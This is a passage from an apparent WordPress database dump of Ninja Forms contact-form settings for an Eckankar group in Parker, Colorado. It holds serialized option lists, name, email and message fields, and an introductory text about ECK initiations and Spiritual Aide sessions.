Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(12277,381,'element_class','','element_class',''),(12276,381,'desc_text','','desc_text',''),(12275,381,'desc_pos','none','desc_pos','none'),(12274,381,'show_desc','0','show_desc','0'),(12273,381,'help_text','','help_text',''),(12272,381,'show_help','0','show_help','0'),(12271,381,'admin_label','','admin_label',''),(12270,381,'num_sort','0','num_sort','0'),(12269,381,'user_state','0','user_state','0'),(12268,381,'calc_auto_include','0','calc_auto_include','0'),(12267,381,'user_info_field_group','','user_info_field_group',''),(5913,207,'objectType','Field','objectType','Field'),(5914,207,'objectDomain','fields','objectDomain','fields'),(5915,207,'editActive','','editActive',''),(5916,207,'order','7','order','7'),(5917,207,'type','listselect','type','listselect'),(5918,207,'label','Select The Person You Would Like To Contact','label','Select The Person You Would Like To Contact'),(5919,207,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5920,207,'label_pos','above','label_pos','above'),(5921,207,'list_type','dropdown','list_type','dropdown'),(5922,207,'multi_size','5','multi_size','5'),(5923,207,'list_show_value','1','list_show_value','1'),(5924,207,'list','a:0:{}','list','a:0:{}'),(5925,207,'user_info_field_group','','user_info_field_group',''),(5926,207,'calc_auto_include','0','calc_auto_include','0'),(5927,207,'user_state','0','user_state','0'),(5928,207,'num_sort','0','num_sort','0'),(5929,207,'admin_label','','admin_label',''),(5930,207,'show_help','0','show_help','0'),(5931,207,'help_text','','help_text',''),(5932,207,'show_desc','0','show_desc','0'),(5933,207,'desc_pos','none','desc_pos','none'),(5934,207,'desc_text','','desc_text',''),(5935,207,'element_class','','element_class',''),(5936,207,'required','1','required','1'),(5937,207,'options','a:1:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:1:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8790,211,'field_label','Text','field_label','Text'),(8791,211,'field_key','html_165','field_key','html_165'),(5938,207,'key','select_the_person_you_would_like_to_contact_1613166754232','key','select_the_person_you_would_like_to_contact_1613166754232'),(5939,207,'container_class','one-half','container_class','one-half'),(5940,207,'parent_id','19','parent_id','19'),(5941,208,'objectType','Field','objectType','Field'),(5942,208,'objectDomain','fields','objectDomain','fields'),(5943,208,'editActive','','editActive',''),(5944,208,'order','8','order','8'),(5945,208,'type','textarea','type','textarea'),(5946,208,'label','Enter Your Message Here','label','Enter Your Message Here'),(5947,208,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5948,208,'label_pos','above','label_pos','above'),(5949,208,'default_value','','default_value',''),(5950,208,'textarea_rte','0','textarea_rte','0'),(5951,208,'textarea_media','0','textarea_media','0'),(5952,208,'disable_rte_mobile','0','disable_rte_mobile','0'),(5953,208,'input_limit','','input_limit',''),(5954,208,'input_limit_type','char','input_limit_type','char'),(5955,208,'calc_auto_include','0','calc_auto_include','0'),(5956,208,'num_sort','0','num_sort','0'),(5957,208,'admin_label','','admin_label',''),(5958,208,'show_help','0','show_help','0'),(5959,208,'help_text','','help_text',''),(5960,208,'show_desc','0','show_desc','0'),(5961,208,'desc_pos','none','desc_pos','none'),(5962,208,'desc_text','','desc_text',''),(5963,208,'element_class','','element_class',''),(5964,208,'required','1','required','1'),(5965,208,'default','','default',''),(5966,208,'key','textarea_162','key','textarea_162'),(5967,208,'placeholder','','placeholder',''),(5968,208,'container_class','','container_class',''),(5969,208,'manual_key','','manual_key',''),(5970,208,'parent_id','19','parent_id','19'),(17451,619,'default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17449,619,'label','HTML','label','HTML'),(17450,619,'type','html','type','html'),(17448,619,'idAttribute','id','idAttribute','id'),(17447,619,'order','11','order','11'),(17446,619,'editActive','','editActive',''),(17445,618,'key','html_1663797717432','key','html_1663797717432'),(17444,618,'element_class','','element_class',''),(17443,618,'container_class','','container_class',''),(17442,618,'default','','default',''),(5988,210,'objectType','Field','objectType','Field'),(5989,210,'objectDomain','fields','objectDomain','fields'),(5990,210,'editActive','','editActive',''),(5991,210,'order','10','order','10'),(5992,210,'type','submit','type','submit'),(5993,210,'label','Submit','label','Submit'),(5994,210,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5995,210,'show_help','0','show_help','0'),(5996,210,'help_text','','help_text',''),(5997,210,'show_desc','0','show_desc','0'),(5998,210,'desc_pos','none','desc_pos','none'),(5999,210,'desc_text','','desc_text',''),(6000,210,'processing_label','Processing','processing_label','Processing'),(6001,210,'element_class','','element_class',''),(6002,210,'key','submit_164','key','submit_164'),(6003,210,'container_class','','container_class',''),(6004,210,'parent_id','19','parent_id','19'),(6005,211,'objectType','Field','objectType','Field'),(6006,211,'objectDomain','fields','objectDomain','fields'),(6007,211,'editActive','','editActive',''),(6008,211,'order','1','order','1'),(6009,211,'type','html','type','html'),(6010,211,'label','Text','label','Text'),(6011,211,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6012,211,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Parker Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Parker Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.'),(6013,211,'desc_el','div','desc_el','div'),(6014,211,'show_desc','0','show_desc','0'),(6015,211,'desc_pos','none','desc_pos','none'),(6016,211,'desc_text','','desc_text',''),(6017,211,'element_class','','element_class',''),(6018,211,'default','<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Parker Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','default','<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Parker Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>'),(6019,211,'key','html_165','key','html_165'),(6020,211,'container_class','','container_class',''),(6021,211,'drawerDisabled','','drawerDisabled',''),(6022,211,'parent_id','20','parent_id','20'),(6023,212,'objectType','Field','objectType','Field'),(6024,212,'objectDomain','fields','objectDomain','fields'),(6025,212,'editActive','','editActive',''),(6026,212,'order','2','order','2'),(6027,212,'type','textbox','type','textbox'),(6028,212,'def_id','6','def_id','6'),(6029,212,'label','First Name','label','First Name'),(6030,212,'label_pos','above','label_pos','above'),(6031,212,'mask','','mask',''),(6032,212,'datepicker','0','datepicker','0'),(6033,212,'first_name','1','first_name','1'),(6034,212,'last_name','0','last_name','0'),(6035,212,'from_name','0','from_name','0'),(6036,212,'user_info_field_group','1','user_info_field_group','1'),(6037,212,'show_help','0','show_help','0'),(6038,212,'help_text','','help_text',''),(6039,212,'calc_auto_include','0','calc_auto_include','0'),(6040,212,'calc_option','0','calc_option','0'),(6041,212,'placeholder','','placeholder',''),(6042,212,'user_address_1','','user_address_1',''),(6043,212,'user_address_2','','user_address_2',''),(6044,212,'user_city','','user_city',''),(6045,212,'user_zip','','user_zip',''),(6046,212,'user_phone','','user_phone',''),(6047,212,'user_email','','user_email',''),(6048,212,'disable_input','0','disable_input','0'),(6049,212,'input_limit','','input_limit',''),(6050,212,'input_limit_type','char','input_limit_type','char'),(6051,212,'input_limit_msg','','input_limit_msg',''),(6052,212,'user_state','0','user_state','0'),(6053,212,'autocomplete_off','0','autocomplete_off','0'),(6054,212,'num_sort','0','num_sort','0'),(6055,212,'admin_label','','admin_label',''),(6056,212,'user_info_field_group_name','','user_info_field_group_name',''),(6057,212,'user_info_field_group_custom','','user_info_field_group_custom',''),(6058,212,'show_desc','0','show_desc','0'),(6059,212,'desc_pos','none','desc_pos','none'),(6060,212,'desc_text','','desc_text',''),(6061,212,'element_class','','element_class',''),(6062,212,'required','1','required','1'),(6063,212,'key','textbox_166','key','textbox_166'),(6064,212,'default','','default',''),(6065,212,'container_class','one-half first','container_class','one-half first'),(6066,212,'manual_key','','manual_key',''),(6067,212,'custom_mask','','custom_mask',''),(6068,212,'parent_id','20','parent_id','20'),(6069,213,'objectType','Field','objectType','Field'),(6070,213,'objectDomain','fields','objectDomain','fields'),(6071,213,'editActive','','editActive',''),(6072,213,'order','3','order','3'),(6073,213,'type','lastname','type','lastname'),(6074,213,'def_id','7','def_id','7'),(6075,213,'label','Last Name','label','Last Name'),(6076,213,'label_pos','above','label_pos','above'),(6077,213,'mask','','mask',''),(6078,213,'datepicker','0','datepicker','0'),(6079,213,'first_name','0','first_name','0'),(6080,213,'from_name','0','from_name','0'),(6081,213,'user_info_field_group','1','user_info_field_group','1'),(6082,213,'show_help','0','show_help','0'),(6083,213,'help_text','','help_text',''),(6084,213,'calc_auto_include','0','calc_auto_include','0'),(6085,213,'calc_option','0','calc_option','0'),(6086,213,'placeholder','','placeholder',''),(6087,213,'user_address_1','','user_address_1',''),(6088,213,'user_address_2','','user_address_2',''),(6089,213,'user_city','','user_city',''),(6090,213,'user_zip','','user_zip',''),(6091,213,'user_phone','','user_phone',''),(6092,213,'user_email','','user_email',''),(6093,213,'disable_input','0','disable_input','0'),(6094,213,'input_limit','','input_limit',''),(6095,213,'input_limit_type','char','input_limit_type','char'),(6096,213,'input_limit_msg','','input_limit_msg',''),(6097,213,'user_state','0','user_state','0'),(6098,213,'autocomplete_off','0','autocomplete_off','0'),(6099,213,'num_sort','0','num_sort','0'),(6100,213,'admin_label','','admin_label',''),(6101,213,'user_info_field_group_name','','user_info_field_group_name',''),(6102,213,'user_info_field_group_custom','','user_info_field_group_custom',''),(6103,213,'show_desc','0','show_desc','0'),(6104,213,'desc_pos','none','desc_pos','none'),(6105,213,'desc_text','','desc_text',''),(6106,213,'element_class','','element_class',''),(6107,213,'required','1','required','1'),(6108,213,'key','lastname_167','key','lastname_167'),(6109,213,'default','','default',''),(6110,213,'container_class','one-half','container_class','one-half'),(6111,213,'parent_id','20','parent_id','20'),(6112,214,'objectType','Field','objectType','Field'),(6113,214,'objectDomain','fields','objectDomain','fields'),(6114,214,'editActive','','editActive',''),(6115,214,'order','4','order','4'),(6116,214,'type','email','type','email'),(6117,214,'def_id','14','def_id','14'),(6118,214,'label','Email','label','Email'),(6119,214,'label_pos','above','label_pos','above'),(6120,214,'mask','','mask',''),(6121,214,'datepicker','0','datepicker','0'),(6122,214,'first_name','0','first_name','0'),(6123,214,'last_name','0','last_name','0'),(6124,214,'from_name','0','from_name','0'),(6125,214,'user_address_1','0','user_address_1','0'),(6126,214,'user_address_2','0','user_address_2','0'),(6127,214,'user_city','0','user_city','0'),(6128,214,'user_zip','0','user_zip','0'),(6129,214,'user_pho